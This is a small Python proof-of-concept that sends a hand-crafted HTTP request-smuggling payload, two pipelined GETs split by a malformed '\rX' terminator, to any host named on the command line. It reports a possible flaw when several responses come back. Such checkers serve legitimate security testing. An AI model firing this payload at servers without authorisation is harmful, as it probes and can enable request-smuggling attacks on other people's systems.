import socket
import sys

def check_vuln(host, port=80):
    # Craft the payload
    smuggled_payload = (
        "GET / HTTP/1.0\r\n"
        f"Host: {host}\r\n"
        "Connection: keep-alive\r\n"
        "\rX"  # Malformed termination
        "GET / HTTP/1.0\r\n"
        f"Host: {host}\r\n"
        "Connection: close\r\n"
        "\r\n"
    )

    print("[+] Raw request being sent:\n")
    print(smuggled_payload.encode().decode('latin1'))  # Using latin1 to preserve raw bytes

    try:
        s = socket.create_connection((host, port))
        s.sendall(smuggled_payload.encode('latin1'))

        response = b""
        while True:
            chunk = s.recv(4096)
            if not chunk:
                break
            response += chunk

        s.close()

        print("\n[+] Raw response received:\n")
        print(response.decode('latin1', errors='replace'))  # latin1 preserves byte-for-byte mapping

        if response.count(b'HTTP/') > 1:
            print("\n[!] Potential vulnerability detected: multiple HTTP responses found.")
        else:
            print("\n[*] No multiple HTTP responses found.")
    except Exception as e:
        print(f"[!] Error: {e}")

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: python {sys.argv[0]} <host> [port]")
        sys.exit(1)

    target_host = sys.argv[1]
    target_port = int(sys.argv[2]) if len(sys.argv) > 2 else 80
    check_vuln(target_host, target_port)